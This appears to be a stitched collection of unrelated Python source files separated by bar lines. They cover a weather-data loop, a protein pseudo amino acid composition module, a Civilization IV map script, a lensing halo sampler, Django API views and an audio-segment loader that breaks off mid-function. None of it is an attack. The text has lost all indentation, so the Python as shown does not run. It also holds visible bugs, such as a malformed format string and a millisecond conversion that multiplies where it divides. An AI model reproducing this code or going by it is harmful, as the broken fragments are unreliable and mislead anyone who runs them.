elif len(argv) == 3:
# Run for a given month!
sts = utc(int(argv[1]), int(argv[2]), 1, 12, 0)
# run for last date of previous month as well
sts = sts.astimezone(pytz.timezone("America/Chicago"))
sts = sts - datetime.timedelta(days=1)
ets = sts + datetime.timedelta(days=45)
ets = ets.replace(day=1)
now = sts
while now < ets:
run(now)
now += datetime.timedelta(days=1)
else:
print("ERROR: call with hrrr_solarrad.py <YYYY> <mm> <dd>")
if __name__ == '__main__':
# run main() run
main(sys.argv)
|
# -*- coding: utf-8 -*-
# Copyright (c) 2016-2017, Zhijiang Yao, Jie Dong and Dongsheng Cao
# All rights reserved.
# This file is part of the PyBioMed.
# The contents are covered by the terms of the BSD license
# which is included in the file license.txt, found at the root
# of the PyBioMed source tree.
"""
#########################################################################################
Instead of using the conventional 20-D amino acid composition to represent the sample
of a protein, Prof. Kuo-Chen Chou proposed the pseudo amino acid (PseAA) composition
in order for inluding the sequence-order information. Based on the concept of Chou's
pseudo amino acid composition, the server PseAA was designed in a flexible way, allowing
users to generate various kinds of pseudo amino acid composition for a given protein
sequence by selecting different parameters and their combinations. This module aims at
computing two types of PseAA descriptors: Type I and Type II.
You can freely use and distribute it. If you have any problem, you could contact
with us timely.
References:
[1]: Kuo-Chen Chou. Prediction of Protein Cellular Attributes Using Pseudo-Amino Acid
Composition. PROTEINS: Structure, Function, and Genetics, 2001, 43: 246-255.
[2]: http://www.csbio.sjtu.edu.cn/bioinf/PseAAC/
[3]: http://www.csbio.sjtu.edu.cn/bioinf/PseAAC/type2.htm
[4]: Kuo-Chen Chou. Using amphiphilic pseudo amino acid composition to predict enzyme
subfamily classes. Bioinformatics, 2005,21,10-19.
Authors: Zhijiang Yao and Dongsheng Cao.
Date: 2016.06.04
Email: gadsby@163.com
#########################################################################################
"""
# Core Library modules
import math
import string
# import scipy
AALetter = [
"A",
"R",
"N",
"D",
"C",
"E",
"Q",
"G",
"H",
"I",
"L",
"K",
"M",
"F",
"P",
"S",
"T",
"W",
"Y",
"V",
]
_Hydrophobicity = {
"A": 0.62,
"R": -2.53,
"N": -0.78,
"D": -0.90,
"C": 0.29,
"Q": -0.85,
"E": -0.74,
"G": 0.48,
"H": -0.40,
"I": 1.38,
"L": 1.06,
"K": -1.50,
"M": 0.64,
"F": 1.19,
"P": 0.12,
"S": -0.18,
"T": -0.05,
"W": 0.81,
"Y": 0.26,
"V": 1.08,
}
_hydrophilicity = {
"A": -0.5,
"R": 3.0,
"N": 0.2,
"D": 3.0,
"C": -1.0,
"Q": 0.2,
"E": 3.0,
"G": 0.0,
"H": -0.5,
"I": -1.8,
"L": -1.8,
"K": 3.0,
"M": -1.3,
"F": -2.5,
"P": 0.0,
"S": 0.3,
"T": -0.4,
"W": -3.4,
"Y": -2.3,
"V": -1.5,
}
_residuemass = {
"A": 15.0,
"R": 101.0,
"N": 58.0,
"D": 59.0,
"C": 47.0,
"Q": 72.0,
"E": 73.0,
"G": 1.000,
"H": 82.0,
"I": 57.0,
"L": 57.0,
"K": 73.0,
"M": 75.0,
"F": 91.0,
"P": 42.0,
"S": 31.0,
"T": 45.0,
"W": 130.0,
"Y": 107.0,
"V": 43.0,
}
_pK1 = {
"A": 2.35,
"C": 1.71,
"D": 1.88,
"E": 2.19,
"F": 2.58,
"G": 2.34,
"H": 1.78,
"I": 2.32,
"K": 2.20,
"L": 2.36,
"M": 2.28,
"N": 2.18,
"P": 1.99,
"Q": 2.17,
"R": 2.18,
"S": 2.21,
"T": 2.15,
"V": 2.29,
"W": 2.38,
"Y": 2.20,
}
_pK2 = {
"A": 9.87,
"C": 10.78,
"D": 9.60,
"E": 9.67,
"F": 9.24,
"G": 9.60,
"H": 8.97,
"I": 9.76,
"K": 8.90,
"L": 9.60,
"M": 9.21,
"N": 9.09,
"P": 10.6,
"Q": 9.13,
"R": 9.09,
"S": 9.15,
"T": 9.12,
"V": 9.74,
"W": 9.39,
"Y": 9.11,
}
_pI = {
"A": 6.11,
"C": 5.02,
"D": 2.98,
"E": 3.08,
"F": 5.91,
"G": 6.06,
"H": 7.64,
"I": 6.04,
"K": 9.47,
"L": 6.04,
"M": 5.74,
"N": 10.76,
"P": 6.30,
"Q": 5.65,
"R": 10.76,
"S": 5.68,
"T": 5.60,
"V": 6.02,
"W": 5.88,
"Y": 5.63,
}
#############################################################################################
def _mean(listvalue):
"""
########################################################################################
The mean value of the list data.
Usage:
result=_mean(listvalue)
########################################################################################
"""
return sum(listvalue) / len(listvalue)
##############################################################################################
def _std(listvalue, ddof=1):
"""
########################################################################################
The standard deviation of the list data.
Usage:
result=_std(listvalue)
########################################################################################
"""
mean = _mean(listvalue)
temp = [math.pow(i - mean, 2) for i in listvalue]
res = math.sqrt(sum(temp) / (len(listvalue) - ddof))
return res
##############################################################################################
def NormalizeEachAAP(AAP):
"""
########################################################################################
All of the amino acid indices are centralized and
standardized before the calculation.
Usage:
result=NormalizeEachAAP(AAP)
Input: AAP is a dict form containing the properties of 20 amino acids.
Output: result is the a dict form containing the normalized properties
of 20 amino acids.
########################################################################################
"""
if len(AAP.values()) != 20:
print("You can not input the correct number of properities of Amino acids!")
else:
Result = {}
for i, j in AAP.items():
Result[i] = (j - _mean(AAP.values())) / _std(AAP.values(), ddof=0)
return Result
#############################################################################################
#############################################################################################
##################################Type I descriptors#########################################
####################### Pseudo-Amino Acid Composition descriptors############################
#############################################################################################
#############################################################################################
def _GetCorrelationFunction(
Ri="S", Rj="D", AAP=[_Hydrophobicity, _hydrophilicity, _residuemass]
):
"""
########################################################################################
Computing the correlation between two given amino acids using the above three
properties.
Usage:
result=_GetCorrelationFunction(Ri,Rj)
Input: Ri and Rj are the amino acids, respectively.
Output: result is the correlation value between two amino acids.
########################################################################################
"""
Hydrophobicity = NormalizeEachAAP(AAP[0])
hydrophilicity = NormalizeEachAAP(AAP[1])
residuemass = NormalizeEachAAP(AAP[2])
theta1 = math.pow(Hydrophobicity[Ri] - Hydrophobicity[Rj], 2)
theta2 = math.pow(hydrophilicity[Ri] - hydrophilicity[Rj], 2)
theta3 = math.pow(residuemass[Ri] - residuemass[Rj], 2)
theta = round((theta1 + theta2 + theta3) / 3.0, 3)
return theta
#############################################################################################
def _GetSequenceOrderCorrelationFactor(ProteinSequence, k=1):
"""
########################################################################################
Computing the Sequence order correlation factor with gap equal to k based on
[_Hydrophobicity,_hydrophilicity,_residuemass].
Usage:
result=_GetSequenceOrderCorrelationFactor(protein,k)
Input: protein is a pure protein sequence.
k is the gap.
Output: result is the correlation factor value with the gap equal to k.
########################################################################################
"""
LengthSequence = len(ProteinSequence)
res = []
for i in range(LengthSequence - k):
AA1 = ProteinSequence[i]
AA2 = ProteinSequence[i + k]
res.append(_GetCorrelationFunction(AA1, AA2))
result = round(sum(res) / (LengthSequence - k), 3)
return result
#############################################################################################
def GetAAComposition(ProteinSequence):
"""
########################################################################################
Calculate the composition of Amino acids
for a given protein sequence.
Usage:
result=CalculateAAComposition(protein)
Input: protein is a pure protein sequence.
Output: result is a dict form containing the composition of
20 amino acids.
########################################################################################
"""
LengthSequence = len(ProteinSequence)
Result = {}
for i in AALetter:
Result[i] = round(float(ProteinSequence.count(i)) / LengthSequence * 100, 3)
return Result
#############################################################################################
def _GetPseudoAAC1(ProteinSequence, lamda=10, weight=0.05):
"""
#######################################################################################
Computing the first 20 of type I pseudo-amino acid compostion descriptors based on
[_Hydrophobicity,_hydrophilicity,_residuemass].
########################################################################################
"""
rightpart = 0.0
for i in range(lamda):
rightpart = rightpart + _GetSequenceOrderCorrelationFactor(
ProteinSequence, k=i + 1
)
AAC = GetAAComposition(ProteinSequence)
result = {}
temp = 1 + weight * rightpart
for index, i in enumerate(AALetter):
result["PAAC" + str(index + 1)] = round(AAC[i] / temp, 3)
return result
#############################################################################################
def _GetPseudoAAC2(ProteinSequence, lamda=10, weight=0.05):
"""
########################################################################################
Computing the last lamda of type I pseudo-amino acid compostion descriptors based on
[_Hydrophobicity,_hydrophilicity,_residuemass].
########################################################################################
"""
rightpart = []
for i in range(lamda):
rightpart.append(_GetSequenceOrderCorrelationFactor(ProteinSequence, k=i + 1))
result = {}
temp = 1 + weight * sum(rightpart)
for index in range(20, 20 + lamda):
result["PAAC" + str(index + 1)] = round(
weight * rightpart[index - 20] / temp * 100, 3
)
return result
#############################################################################################
def _GetPseudoAAC(ProteinSequence, lamda=10, weight=0.05):
"""
#######################################################################################
Computing all of type I pseudo-amino acid compostion descriptors based on three given
properties. Note that the number of PAAC strongly depends on the lamda value. if lamda
= 20, we can obtain 20+20=40 PAAC descriptors. The size of these values depends on the
choice of lamda and weight simultaneously.
AAP=[_Hydrophobicity,_hydrophilicity,_residuemass]
Usage:
result=_GetAPseudoAAC(protein,lamda,weight)
Input: protein is a pure protein sequence.
lamda factor reflects the rank of correlation and is a non-Negative integer, such as 15.
Note that (1)lamda should NOT be larger than the length of input protein sequence;
(2) lamda must be non-Negative integer, such as 0, 1, 2, ...; (3) when lamda =0, the
output of PseAA server is the 20-D amino acid composition.
weight factor is designed for the users to put weight on the additional PseAA components
with respect to the conventional AA components. The user can select any value within the
region from 0.05 to 0.7 for the weight factor.
Output: result is a dict form containing calculated 20+lamda PAAC descriptors.
########################################################################################
"""
res = {}
res.update(_GetPseudoAAC1(ProteinSequence, lamda=lamda, weight=weight))
res.update(_GetPseudoAAC2(ProteinSequence, lamda=lamda, weight=weight))
return res
#############################################################################################
##################################Type II descriptors########################################
###############Amphiphilic Pseudo-Amino Acid Composition descriptors#########################
#############################################################################################
#############################################################################################
def _GetCorrelationFunctionForAPAAC(
Ri="S", Rj="D", AAP=[_Hydrophobicity, _hydrophilicity]
):
"""
########################################################################################
Computing the correlation between two given amino acids using the above two
properties for APAAC (type II PseAAC).
Usage:
result=_GetCorrelationFunctionForAPAAC(Ri,Rj)
Input: Ri and Rj are the amino acids, respectively.
Output: result is the correlation value between two amino acids.
########################################################################################
"""
Hydrophobicity = NormalizeEachAAP(AAP[0])
hydrophilicity = NormalizeEachAAP(AAP[1])
theta1 = round(Hydrophobicity[Ri] * Hydrophobicity[Rj], 3)
theta2 = round(hydrophilicity[Ri] * hydrophilicity[Rj], 3)
return theta1, theta2
#############################################################################################
def GetSequenceOrderCorrelationFactorForAPAAC(ProteinSequence, k=1):
"""
########################################################################################
Computing the Sequence order correlation factor with gap equal to k based on
[_Hydrophobicity,_hydrophilicity] for APAAC (type II PseAAC) .
Usage:
result=GetSequenceOrderCorrelationFactorForAPAAC(protein,k)
Input: protein is a pure protein sequence.
k is the gap.
Output: result is the correlation factor value with the gap equal to k.
########################################################################################
"""
LengthSequence = len(ProteinSequence)
resHydrophobicity = []
reshydrophilicity = []
for i in range(LengthSequence - k):
AA1 = ProteinSequence[i]
AA2 = ProteinSequence[i + k]
temp = _GetCorrelationFunctionForAPAAC(AA1, AA2)
resHydrophobicity.append(temp[0])
reshydrophilicity.append(temp[1])
result = []
result.append(round(sum(resHydrophobicity) / (LengthSequence - k), 3))
result.append(round(sum(reshydrophilicity) / (LengthSequence - k), 3))
return result
#############################################################################################
def GetAPseudoAAC1(ProteinSequence, lamda=30, weight=0.5):
"""
########################################################################################
Computing the first 20 of type II pseudo-amino acid compostion descriptors based on
[_Hydrophobicity,_hydrophilicity].
########################################################################################
"""
rightpart = 0.0
for i in range(lamda):
rightpart = rightpart + sum(
GetSequenceOrderCorrelationFactorForAPAAC(ProteinSequence, k=i + 1)
)
AAC = GetAAComposition(ProteinSequence)
result = {}
temp = 1 + weight * rightpart
for index, i in enumerate(AALetter):
result["APAAC" + str(index + 1)] = round(AAC[i] / temp, 3)
return result
#############################################################################################
def GetAPseudoAAC2(ProteinSequence, lamda=30, weight=0.5):
"""
#######################################################################################
Computing the last lamda of type II pseudo-amino acid compostion descriptors based on
[_Hydrophobicity,_hydrophilicity].
#######################################################################################
"""
rightpart = []
for i in range(lamda):
temp = GetSequenceOrderCorrelationFactorForAPAAC(ProteinSequence, k=i + 1)
rightpart.append(temp[0])
rightpart.append(temp[1])
result = {}
temp = 1 + weight * sum(rightpart)
for index in range(20, 20 + 2 * lamda):
result["PAAC" + str(index + 1)] = round(
weight * rightpart[index - 20] / temp * 100, 3
)
return result
#############################################################################################
def GetAPseudoAAC(ProteinSequence, lamda=30, weight=0.5):
"""
#######################################################################################
Computing all of type II pseudo-amino acid compostion descriptors based on the given
properties. Note that the number of PAAC strongly depends on the lamda value. if lamda
= 20, we can obtain 20+20=40 PAAC descriptors. The size of these values depends on the
choice of lamda and weight simultaneously.
Usage:
result=GetAPseudoAAC(protein,lamda,weight)
Input: protein is a pure protein sequence.
lamda factor reflects the rank of correlation and is a non-Negative integer, such as 15.
Note that (1)lamda should NOT be larger than the length of input protein sequence;
(2) lamda must be non-Negative integer, such as 0, 1, 2, ...; (3) when lamda =0, the
output of PseAA server is the 20-D amino acid composition.
weight factor is designed for the users to put weight on the additional PseAA components
with respect to the conventional AA components. The user can select any value within the
region from 0.05 to 0.7 for the weight factor.
Output: result is a dict form containing calculated 20+lamda PAAC descriptors.
#######################################################################################
"""
res = {}
res.update(GetAPseudoAAC1(ProteinSequence, lamda=lamda, weight=weight))
res.update(GetAPseudoAAC2(ProteinSequence, lamda=lamda, weight=weight))
return res
#############################################################################################
#############################################################################################
##################################Type I descriptors#########################################
####################### Pseudo-Amino Acid Composition descriptors############################
#############################based on different properties###################################
#############################################################################################
#############################################################################################
def GetCorrelationFunction(Ri="S", Rj="D", AAP=[]):
"""
########################################################################################
Computing the correlation between two given amino acids using the given
properties.
Usage:
result=GetCorrelationFunction(Ri,Rj,AAP)
Input: Ri and Rj are the amino acids, respectively.
AAP is a list form containing the properties, each of which is a dict form.
Output: result is the correlation value between two amino acids.
########################################################################################
"""
NumAAP = len(AAP)
theta = 0.0
for i in range(NumAAP):
temp = NormalizeEachAAP(AAP[i])
theta = theta + math.pow(temp[Ri] - temp[Rj], 2)
result = round(theta / NumAAP, 3)
return result
#############################################################################################
def GetSequenceOrderCorrelationFactor(ProteinSequence, k=1, AAP=[]):
"""
########################################################################################
Computing the Sequence order correlation factor with gap equal to k based on
the given properities.
Usage:
result=GetSequenceOrderCorrelationFactor(protein,k,AAP)
Input: protein is a pure protein sequence.
k is the gap.
AAP is a list form containing the properties, each of which is a dict form.
Output: result is the correlation factor value with the gap equal to k.
########################################################################################
"""
LengthSequence = len(ProteinSequence)
res = []
for i in range(LengthSequence - k):
AA1 = ProteinSequence[i]
AA2 = ProteinSequence[i + k]
res.append(GetCorrelationFunction(AA1, AA2, AAP))
result = round(sum(res) / (LengthSequence - k), 3)
return result
#############################################################################################
def GetPseudoAAC1(ProteinSequence, lamda=30, weight=0.05, AAP=[]):
"""
#######################################################################################
Computing the first 20 of type I pseudo-amino acid compostion descriptors based on the given
properties.
########################################################################################
"""
rightpart = 0.0
for i in range(lamda):
rightpart = rightpart + GetSequenceOrderCorrelationFactor(
ProteinSequence, i + 1, AAP
)
AAC = GetAAComposition(ProteinSequence)
result = {}
temp = 1 + weight * rightpart
for index, i in enumerate(AALetter):
result["PAAC" + str(index + 1)] = round(AAC[i] / temp, 3)
return result
#############################################################################################
def GetPseudoAAC2(ProteinSequence, lamda=30, weight=0.05, AAP=[]):
"""
#######################################################################################
Computing the last lamda of type I pseudo-amino acid compostion descriptors based on the given
properties.
########################################################################################
"""
rightpart = []
for i in range(lamda):
rightpart.append(GetSequenceOrderCorrelationFactor(ProteinSequence, i + 1, AAP))
result = {}
temp = 1 + weight * sum(rightpart)
for index in range(20, 20 + lamda):
result["PAAC" + str(index + 1)] = round(
weight * rightpart[index - 20] / temp * 100, 3
)
return result
#############################################################################################
def GetPseudoAAC(ProteinSequence, lamda=30, weight=0.05, AAP=[]):
"""
#######################################################################################
Computing all of type I pseudo-amino acid compostion descriptors based on the given
properties. Note that the number of PAAC strongly depends on the lamda value. if lamda
= 20, we can obtain 20+20=40 PAAC descriptors. The size of these values depends on the
choice of lamda and weight simultaneously. You must specify some properties into AAP.
Usage:
result=GetPseudoAAC(protein,lamda,weight)
Input: protein is a pure protein sequence.
lamda factor reflects the rank of correlation and is a non-Negative integer, such as 15.
Note that (1)lamda should NOT be larger than the length of input protein sequence;
(2) lamda must be non-Negative integer, such as 0, 1, 2, ...; (3) when lamda =0, the
output of PseAA server is the 20-D amino acid composition.
weight factor is designed for the users to put weight on the additional PseAA components
with respect to the conventional AA components. The user can select any value within the
region from 0.05 to 0.7 for the weight factor.
AAP is a list form containing the properties, each of which is a dict form.
Output: result is a dict form containing calculated 20+lamda PAAC descriptors.
########################################################################################
"""
res = {}
res.update(GetPseudoAAC1(ProteinSequence, lamda, weight, AAP))
res.update(GetPseudoAAC2(ProteinSequence, lamda, weight, AAP))
return res
#############################################################################################
if __name__ == "__main__":
import string
protein = "MTDRARLRLHDTAAGVVRDFVPLRPGHVSIYLCGATVQGLPHIGHVRSGVAFDILRRWLL\
ARGYDVAFIRNVTDIEDKILAKAAAAGRPWWEWAATHERAFTAAYDALDVLPPSAEPRAT\
GHITQMIEMIERLIQAGHAYTGGGDVYFDVLSYPEYGQLSGHKIDDVHQGEGVAAGKRDQ\
RDFTLWKGEKPGEPSWPTPWGRGRPGWHLECSAMARSYLGPEFDIHCGGMDLVFPHHENE\
IAQSRAAGDGFARYWLHNGWVTMGGEKMSKSLGNVLSMPAMLQRVRPAELRYYLGSAHYR\
SMLEFSETAMQDAVKAYVGLEDFLHRVRTRVGAVCPGDPTPRFAEALDDDLSVPIALAEI\
HHVRAEGNRALDAGDHDGALRSASAIRAMMGILGCDPLDQRWESRDETSAALAAVDVLVQ\
AELQNREKAREQRNWALADEIRGRLKRAGIEVTDTADGPQWSLLGGDTK"
protein = string.strip(protein)
# temp=_GetCorrelationFunction('S','D')
# print temp
#
# print _GetSequenceOrderCorrelationFactor(protein,k=4)
#
# PAAC1=_GetPseudoAAC1(protein,lamda=4)
# for i in PAAC1:
# print i, PAAC1[i]
# PAAC2=_GetPseudoAAC2(protein,lamda=4)
# for i in PAAC2:
# print i, PAAC2[i]
# print len(PAAC1)
# print _GetSequenceOrderCorrelationFactorForAPAAC(protein,k=1)
# APAAC1=_GetAPseudoAAC1(protein,lamda=4)
# for i in APAAC1:
# print i, APAAC1[i]
# APAAC2=GetAPseudoAAC2(protein,lamda=4)
# for i in APAAC2:
# print i, APAAC2[i]
# APAAC=GetAPseudoAAC(protein,lamda=4)
#
# for i in APAAC:
# print i, APAAC[i]
PAAC = GetPseudoAAC(protein, lamda=5, AAP=[_Hydrophobicity, _hydrophilicity])
for i in PAAC:
print(i, PAAC[i])
|
"""
Author: Mohammad Dehghani Ashkezari <mdehghan@uw.edu>
Date: 2019-07-27
Function: Trains machine learning models using Simons CMAP data sets.
"""
|
#
# FILE: Balanced.py
# AUTHOR: Andy Szybalski
# PURPOSE: Global map script - Solid pangaea, balanced strategic resources.
#-----------------------------------------------------------------------------
# Copyright (c) 2004, 2005 Firaxis Games, Inc. All rights reserved.
#-----------------------------------------------------------------------------
#
from CvPythonExtensions import *
import CvUtil
import random
import CvMapGeneratorUtil
import sys
from CvMapGeneratorUtil import HintedWorld
from CvMapGeneratorUtil import TerrainGenerator
from CvMapGeneratorUtil import FeatureGenerator
def getDescription():
return "TXT_KEY_MAP_SCRIPT_BALANCED_DESCR"
resourcesToBalance = ('BONUS_ALUMINUM', 'BONUS_COAL', 'BONUS_COPPER', 'BONUS_HORSE', 'BONUS_IRON', 'BONUS_OIL', 'BONUS_URANIUM')
resourcesToEliminate = ('BONUS_MARBLE', 'BONUS_OIL')
def getTopLatitude():
return 70
def getBottomLatitude():
return -70
def generatePlotTypes():
NiTextOut("Setting Plot Types (Python Balanced) ...")
global hinted_world
hinted_world = HintedWorld(16,8)
mapRand = CyGlobalContext().getGame().getMapRand()
numBlocks = hinted_world.w * hinted_world.h
numBlocksLand = int(numBlocks*0.25)
cont = hinted_world.addContinent(numBlocksLand,mapRand.get(5, "Generate Plot Types PYTHON")+4,mapRand.get(3, "Generate Plot Types PYTHON")+2)
if not cont:
print "Couldn't create continent! Reverting to C implementation."
CyPythonMgr().allowDefaultImpl()
else:
for x in range(hinted_world.w):
for y in (0, hinted_world.h - 1):
hinted_world.setValue(x,y, 1) # force ocean at poles
hinted_world.buildAllContinents()
return hinted_world.generatePlotTypes(shift_plot_types=True)
# subclass TerrainGenerator to eliminate arctic, equatorial latitudes
class BTerrainGenerator(CvMapGeneratorUtil.TerrainGenerator):
def getLatitudeAtPlot(self, iX, iY):
"returns 0.0 for tropical, up to 1.0 for polar"
lat = CvMapGeneratorUtil.TerrainGenerator.getLatitudeAtPlot(self, iX, iY) # range [0,1]
lat = 0.05 + 0.75*lat # range [0.05, 0.75]
return lat
def generateTerrainTypes():
NiTextOut("Generating Terrain (Python Balanced) ...")
terraingen = BTerrainGenerator()
terrainTypes = terraingen.generateTerrain()
return terrainTypes
# subclass FeatureGenerator to eliminate arctic, equatorial latitudes
class BFeatureGenerator(CvMapGeneratorUtil.FeatureGenerator):
def getLatitudeAtPlot(self, iX, iY):
"returns 0.0 for tropical, up to 1.0 for polar"
lat = CvMapGeneratorUtil.FeatureGenerator.getLatitudeAtPlot(self, iX, iY) # range [0,1]
lat = 0.05 + 0.75*lat # range [0.05, 0.75]
return lat
def addFeatures():
NiTextOut("Adding Features (Python Balanced) ...")
featuregen = BFeatureGenerator()
featuregen.addFeatures()
return 0
def normalizeAddExtras():
gc = CyGlobalContext()
map = CyMap()
for i in range(gc.getMAX_CIV_PLAYERS()):
if (gc.getPlayer(i).isAlive()):
start_plot = gc.getPlayer(i).getStartingPlot() # returns a CyPlot
startx, starty = start_plot.getX(), start_plot.getY()
plots = [] # build a list of the plots near the starting plot
for dx in range(-5,6):
for dy in range(-5,6):
x,y = startx+dx, starty+dy
pLoopPlot = map.plot(x,y)
if not pLoopPlot.isNone():
plots.append(pLoopPlot)
resources_placed = []
for pass_num in range(4):
bIgnoreUniqueRange = pass_num >= 1
bIgnoreOneArea = pass_num >= 2
bIgnoreAdjacent = pass_num >= 3
for bonus in range(gc.getNumBonusInfos()):
type_string = gc.getBonusInfo(bonus).getType()
if (type_string not in resources_placed) and (type_string in resourcesToBalance):
for (pLoopPlot) in plots:
if (pLoopPlot.canHaveBonus(bonus, True)):
if isBonusValid(bonus, pLoopPlot, bIgnoreUniqueRange, bIgnoreOneArea, bIgnoreAdjacent):
pLoopPlot.setBonusType(bonus)
resources_placed.append(type_string)
#print "placed", type_string, "on pass", pass_num
break # go to the next bonus
CyPythonMgr().allowDefaultImpl() # do the rest of the usual normalizeStartingPlots stuff, don't overrride
def addBonusType(argsList):
[iBonusType] = argsList
gc = CyGlobalContext()
type_string = gc.getBonusInfo(iBonusType).getType()
if (type_string in resourcesToBalance) or (type_string in resourcesToEliminate):
return None # don't place any of this bonus randomly
else:
CyPythonMgr().allowDefaultImpl() # pretend we didn't implement this method, and let C handle this bonus in the default way
def isBonusValid(eBonus, pPlot, bIgnoreUniqueRange, bIgnoreOneArea, bIgnoreAdjacent):
"Returns true if we can place a bonus here"
map = CyMap()
gc = CyGlobalContext()
iX, iY = pPlot.getX(), pPlot.getY()
if (not bIgnoreOneArea) and gc.getBonusInfo(eBonus).isOneArea():
if map.getNumBonuses(eBonus) > 0:
if map.getArea(pPlot.getArea()).getNumBonuses(eBonus) == 0:
return False
if not bIgnoreAdjacent:
for iI in range(DirectionTypes.NUM_DIRECTION_TYPES):
pLoopPlot = plotDirection(iX, iY, DirectionTypes(iI))
if not pLoopPlot.isNone():
if (pLoopPlot.getBonusType(-1) != -1) and (pLoopPlot.getBonusType(-1) != eBonus):
return False
if not bIgnoreUniqueRange:
uniqueRange = gc.getBonusInfo(eBonus).getUniqueRange()
for iDX in range(-uniqueRange, uniqueRange+1):
for iDY in range(-uniqueRange, uniqueRange+1):
pLoopPlot = plotXY(iX, iY, iDX, iDY)
if not pLoopPlot.isNone() and pLoopPlot.getBonusType(-1) == eBonus:
return False
return True
|
import numpy as np
class LensConeUniform(object):
"""
This class generates samples drawn uniformly in two dimensions out to maximum radius
r(z) = 0.5 * cone_opening_angle * f(z), where cone_opening_angle is the opening angle of the rendering volume
specified when creating the realization, and f(z) is given by geometry.rendering_scale(z) and depends on the rendering
geometry. For example, if the rendering volume is definied as DOUBLE_CONE (the default setting), then f(z) = 1
for z < z_lens and decreases approaching the source redshift at z > z_lens. As the effect of the rendering geometry
is built into this class, it is best used to generate halo positions distributed randomly in two dimensions
along the line of sight.
"""
def __init__(self, cone_opening_angle, geometry):
"""
:param cone_opening_angle: the opening angle of the rendering volume [arcsec]
If the rendering geometry is DOUBLE_CONE (default) then this is the opening angle of the cone
If the rendering geometry is set to CYLINDER, then this is sets the comoving radius of the cylinder such that
a ray that moves in a straight line from the observer to the lens plane at an angle cone_opening_angle inersects
the edge of the cylinder at z_lens.
:param geometry: an instance of Geometry (Cosmology.geometry)
"""
self._cosmo_geometry = geometry
self._uni = Uniform(0.5 * cone_opening_angle, geometry)
def draw(self, N, z_plane, center_x=0, center_y=0):
"""
Generates samples in two dimensions out to a maximum radius r = 0.5 * cone_opening_angle * f(z)
where f(z) = geometry.rendering_scale(z)
:param N: number of objects to generate
:param z_plane: the redshift where the objects are being placed (used to compute the conversion to physical kpc)
:param center_x: the x-center of the rendering area [arcsec]
:param center_y: the y-center of the rendering area [arcsec]
:return: the x and y coordinates sampled in 2D [kpc]
"""
if N == 0:
return np.array([]), np.array([])
rescale = self._cosmo_geometry.rendering_scale(z_plane)
x_kpc, y_kpc = self._uni.draw(N, z_plane, rescale=rescale,
center_x=center_x, center_y=center_y)
return x_kpc, y_kpc
class Uniform(object):
"""
This class generates samples distributed uniformly in two dimensions out to a radius 0.5 * cone_opening_angle
"""
def __init__(self, rmax2d_arcsec, geometry):
"""
:param rmax2d_arcsec: the maximum radius to render objects [arcsec]
:param geometry: an instance of Geometry (Cosmology.geometry)
"""
self.rmax2d_arcsec = rmax2d_arcsec
self._geo = geometry
def draw(self, N, z_plane, rescale=1.0, center_x=0, center_y=0):
"""
Generate samples distributed uniformly in two dimensions
:param N: number of objects to generate
:param z_plane: the redshift where the objects are being placed (used to compute the conversion to physical kpc)
:param rescale: rescales the maximum rendering radius
:param center_x: the x-center of the rendering area [arcsec]
:param center_y: the y-center of the rendering area [arcsec]
:return: the x and y coordinates sampled in 2D [kpc]
"""
if N == 0:
return [], []
angle = np.random.uniform(0, 2 * np.pi, int(N))
rmax = self.rmax2d_arcsec * rescale
r = np.random.uniform(0, rmax ** 2, int(N))
x_arcsec = r ** .5 * np.cos(angle)
y_arcsec = r ** .5 * np.sin(angle)
x_arcsec += center_x
y_arcsec += center_y
kpc_per_asec = self._geo.kpc_per_arcsec(z_plane)
x_kpc, y_kpc = x_arcsec * kpc_per_asec, y_arcsec * kpc_per_asec
return np.array(x_kpc), np.array(y_kpc)
|
from rest_framework.decorators import api_view, renderer_classes
from rest_framework.response import Response
from rest_framework.renderers import JSONRenderer
from django.http import HttpResponse
from .serializers import EstimatorSerializer
from src.estimator import estimator
from rest_framework_xml.renderers import XMLRenderer
from .models import RequestLog
@api_view(['POST'])
@renderer_classes([JSONRenderer, XMLRenderer])
def estimator_view(request, format=None):
serializer = EstimatorSerializer(data=request.data)
serializer.is_valid(raise_exception=True)
data = estimator(serializer.validated_data)
return Response(data)
@api_view(['GET'])
def logs_view(request, ):
log_string = ''
all_logs = RequestLog.objects.order_by('-created_on')
for log in all_logs:
request_time= "{:02d}".format(log.request_time)
log_string += f"{log.method}\t\t{log.path}\t\t{log.status_code}\t\t{request_time}ms\n"
return HttpResponse(log_string, content_type='text/plain')
|
import os
from utils.file_utils import strip_ext
from utils.logger import get_logger
from utils.signal_processing import units_to_sample
from utils.eaf_helper import eaf2df
import logging
class TxtSegments(object):
def __init__(self, root_dir, ts_units="s", add_labels=False, sep="\t", ext=".txt"):
self.root_dir = root_dir
self.ts_units = ts_units
self.add_labels = add_labels
self.sep = sep
self.ext = ext
self.seg_files = [x for x in os.listdir(self.root_dir) if x.endswith(self.ext)]
def get_segs_for_file(self, audio_file, sample_rate):
base_name = strip_ext(os.path.basename(audio_file))
possible_files = [x for x in self.seg_files if base_name in x]
res = []
if len(possible_files) > 0:
seg_file = os.path.join(self.root_dir, possible_files[0])
if len(possible_files) > 1:
get_logger().log(logging.WARNING, "Found multiple matches for %s (%s). Using %s" %
(audio_file, " ".join(possible_files), seg_file))
res = get_txt_segs(seg_file, sample_rate, base_name, self.add_labels, self.sep, self.ts_units)
else:
get_logger().log(logging.WARNING, "No seg file found for % in %s" % (audio_file, self.root_dir))
return res
class EafSegments(object):
def __init__(self, root_dir, ts_units="s", add_labels=False, ext=".eaf"):
self.root_dir = root_dir
self.ts_units = ts_units
self.add_labels = add_labels
self.ext = ext
self.seg_files = [x for x in os.listdir(self.root_dir) if x.endswith(self.ext)]
def get_segs_for_file(self, audio_file, sample_rate):
base_name = strip_ext(os.path.basename(audio_file))
possible_files = [x for x in self.seg_files if base_name in x]
res = []
if len(possible_files) > 0:
seg_file = os.path.join(self.root_dir, possible_files[0])
if len(possible_files) > 1:
get_logger().log(logging.WARNING, "Found multiple matches for %s (%s). Using %s" %
(audio_file, " ".join(possible_files), seg_file))
res = get_eaf_segs(seg_file, sample_rate, base_name, self.add_labels)
else:
get_logger().log(logging.WARNING, "No seg file found for % in %s" % (audio_file, self.root_dir))
return res
def get_eaf_segs(seg_file, sample_rate, base_name, add_labels):
df = eaf2df(seg_file)
df["start"] = df["timeslot_start_ms"] * 1000 * sample_rate
df["end"] = df["timeslot_end_ms"] * 1000 * sample_rate
df["key"] = df.apply(lambda x: "%s-%s-%i-%i" % (base_name, x["annotation_id"], x["start"], x["end"]), axis=1)
if add_labels:
cols = ["start", "end", "key", "annotation"]
else:
